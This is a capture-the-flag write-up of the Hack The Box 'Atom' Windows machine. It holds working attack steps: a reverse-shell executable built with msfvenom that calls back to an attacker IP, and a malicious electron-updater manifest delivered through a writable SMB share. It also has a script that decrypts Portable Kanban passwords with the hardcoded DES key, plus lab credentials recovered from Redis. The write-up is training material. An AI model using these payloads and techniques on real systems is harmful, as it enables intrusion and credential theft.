Tech & Sec

Atom

5 min read 1022 words
htb windows medium electron-updater smb redis portable-kanban yaml-injection

Machine Information

  • Platform: Windows
  • Difficulty: Medium
  • IP Address: 10.129.230.162

Initial Enumeration

Nmap Scan

attacker@kali
attacker@kali:~$ nmap -sV -sT -p- --min-rate 5000 10.129.230.162
Nmap Scan Results
Collapsible Output

Key services: SMB (445), Redis (6379), WinRM (5985)

Service Enumeration

SMB Enumeration

attacker@kali
attacker@kali:~$ smbmap -H 10.129.230.162 -u test -p test
SMB Share Enumeration
$ [*] Detected 1 hosts serving SMB [*] Established 1 SMB session(s) [+] IP: 10.129.230.162:445 Name: atom Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC Software_Updates READ, WRITE

The Software_Updates share has READ/WRITE access with guest credentials!

Exploring Software_Updates Share

attacker@kali
attacker@kali:~$ smbclient --no-pass //10.129.230.162/Software_Updates
Directory Listing
$ smb: \> ls . D 0 Fri May 17 17:36:55 2024 .. D 0 Fri May 17 17:36:55 2024 client1 D 0 Fri May 17 17:36:55 2024 client2 D 0 Fri May 17 17:36:55 2024 client3 D 0 Fri May 17 17:36:55 2024 UAT_Testing_Procedures.pdf A 35202 Fri Apr 9 07:18:08 2021
attacker@kali
attacker@kali:~$ smb: \> get UAT_Testing_Procedures.pdf

The PDF contains UAT testing procedures for a note-taking application called “heed”.

Exploitation

Analyzing the Electron Application

After examining the installer extracted from the PDF documentation, I found the application uses Electron with auto-update functionality.

Extracted Application Structure

$PLUGINSDIR/app-64/resources/
├── app.asar
├── app-update.yml
├── electron.asar
├── elevate.exe
└── node_modules/

Finding the Update Configuration

app-update.yml

provider: generic
url: 'http://updates.atom.htb'
publisherName:
  - HackTheBox

The application checks http://updates.atom.htb for updates!

Extracting app.asar

attacker@kali
attacker@kali:~$ npx asar extract app.asar dest-dir cd dest-dir cat package.json
package.json

{
  "name": "heedv1",
  "version": "1.0.0",
  "main": "main.js",
  "dependencies": {
    "electron-updater": "^2.23.3",
    "electron-log": "^1.3.0",
    "url": "^0.11.0"
  }
}
Vulnerable Dependency
The application uses electron-updater 2.23.3 from 2018 - severely outdated! The current version is 6.2.1. This version is vulnerable to signature bypass and malicious update injection.

Crafting Malicious Update Package

The electron-updater package checks the Software_Updates SMB share for a latest.yml file that defines update metadata.

Step 1: Create reverse shell payload

attacker@kali
attacker@kali:~$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe > "a'tom.exe"
Payload Generation
$ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of exe file: 7168 bytes

Step 2: Calculate SHA-512 hash

attacker@kali
attacker@kali:~$ shasum -a 512 "a'tom.exe" | cut -d " " -f1 | xxd -r -p | base64
SHA-512 Hash
$ Qdk9GLbxYATk99IYFpMGOgKzb/0dCfcQqRNi+2pnp3yNjX2uZtLdr7rcqkSzwh5b9H64iWo5V4pM01Z5OTtNPA==

Step 3: Create latest.yml update manifest

latest.yml

version: 1.2.3
path: http://10.10.14.3/a'tom.exe
sha512: Qdk9GLbxYATk99IYFpMGOgKzb/0dCfcQqRNi+2pnp3yNjX2uZtLdr7rcqkSzwh5b9H64iWo5V4pM01Z5OTtNPA==

Delivering the Payload

attacker@kali
attacker@kali:~$ # Terminal 1: Start HTTP server to host payload python3 -m http.server 80 # Terminal 2: Start netcat listener nc -lvnp 4444 # Terminal 3: Upload latest.yml to SMB share smbclient --no-pass //10.129.230.162/Software_Updates
Upload latest.yml
$ smb: \> cd client1 smb: \client1\> put latest.yml putting file latest.yml as \client1\latest.yml (1.5 kb/s) (average 1.5 kb/s)

Reverse Shell

After about 60 seconds, the application auto-updates and executes our payload:

Reverse Shell Connection
$ # Python HTTP Server 10.129.230.162 - - [20/May/2024 21:55:14] "GET /a%27tom.exe HTTP/1.1" 200 - # Netcat listener connect to [10.10.14.3] from (UNKNOWN) [10.129.230.162] 63920 Microsoft Windows [Version 10.0.19042.906] C:\WINDOWS\system32>whoami atom\jason
Initial Access Obtained
We have a shell as jason through the Electron auto-updater vulnerability!

Post-Exploitation Enumeration

Redis Discovery

Shell
atom\jason C:\Program Files\Redis dir
Redis Directory Contents
$ Directory of C:\Program Files\Redis 05/20/2024 06:31 PM. 05/20/2024 06:31 PM.. 07/01/2016 03:54 PM 1,024 EventLog.dll 04/02/2021 07:31 AMLogs 07/01/2016 03:55 PM 406,016 redis-benchmark.exe 07/01/2016 03:55 PM 482,304 redis-cli.exe 07/01/2016 03:55 PM 1,553,408 redis-server.exe 04/02/2021 07:39 AM 43,962 redis.windows-service.conf 04/02/2021 07:37 AM 43,960 redis.windows.conf

Redis Configuration

Shell
atom\jason C:\Program Files\Redis type redis.windows-service.conf | findstr "requirepass"
Redis Configuration
$ # Redis configuration file requirepass kidvscat_yes_kidvscat

Redis Password: kidvscat_yes_kidvscat

Privilege Escalation

Accessing Redis Database

attacker@kali
attacker@kali:~$ redis-cli -h atom.htb -p 6379 --pass kidvscat_yes_kidvscat
Redis Database Enumeration
$ atom.htb:6379> keys * 1) "pk:ids:MetaDataClass" 2) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff" 3) "pk:ids:User" 4) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0" atom.htb:6379> get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0

{
  "Id":"e8e29158d70d44b1a1ba4949d52790a0",
  "Name":"Administrator",
  "Email":"",
  "EncryptedPassword":"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi",
  "Role":"Admin",
  "Inactive":false,
  "TimeStamp":637530169606440253
}

The Redis database contains an encrypted Administrator password for Portable Kanban!

Decrypting Portable Kanban Password

Portable Kanban uses a hardcoded DES key for password encryption. I created a decryption script:

decrypt.py

#!/usr/bin/env python3
import json
import base64
from des import *  # python3 -m pip install des

try:
    hash = str(input("Enter the Hash : "))
    hash = base64.b64decode(hash.encode('utf-8'))
    key = DesKey(b"7ly6UznJ")
    password = key.decrypt(hash, initial=b"XuVUm5fR", padding=True).decode('utf-8')
    print("Decrypted Password : " + password)
except:
    print("Wrong Hash")
attacker@kali
attacker@kali:~$ python3 decrypt.py
Decryption Output
$ Enter the Hash : Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi Decrypted Password : kidvscat_admin_@123

Administrator Credentials: administrator:kidvscat_admin_@123

WinRM Access as Administrator

attacker@kali
attacker@kali:~$ evil-winrm -i 10.129.230.162 -u 'administrator' -p 'kidvscat_admin_@123'
Evil-WinRM Connection
$ Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami atom\administrator
Root Access Obtained
Successfully escalated to Administrator through Redis credential extraction and Portable Kanban password decryption!

Loot

Credentials

🔐 WinRM
Username: administrator
Password: kidvscat_admin_@123
Host: 10.129.230.162
Notes: Decrypted from Portable Kanban Redis database
🔐 Redis
Username: redis
Password: kidvscat_yes_kidvscat
Host: 10.129.230.162
Port: 6379
Notes: Found in C:\Program Files\Redis\redis.windows-service.conf

Encrypted Password

BASE64 Portable Kanban Encrypted Password (DES)
Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi

Key Takeaways

  1. Electron auto-updater vulnerabilities (especially outdated versions like 2.23.3) allow malicious update injection when update sources are writable
  2. SMB shares with write access can be leveraged to deliver malicious update manifests (latest.yml)
  3. Redis configuration files often contain plaintext passwords that provide access to sensitive databases
  4. Portable Kanban uses hardcoded DES encryption keys (7ly6UznJ and IV XuVUm5fR), making encrypted passwords trivially decryptable
  5. Always check for outdated dependencies in package.json - electron-updater 2.23.3 was released in 2018 and lacks signature verification
  6. Auto-update mechanisms should verify cryptographic signatures and use HTTPS with certificate pinning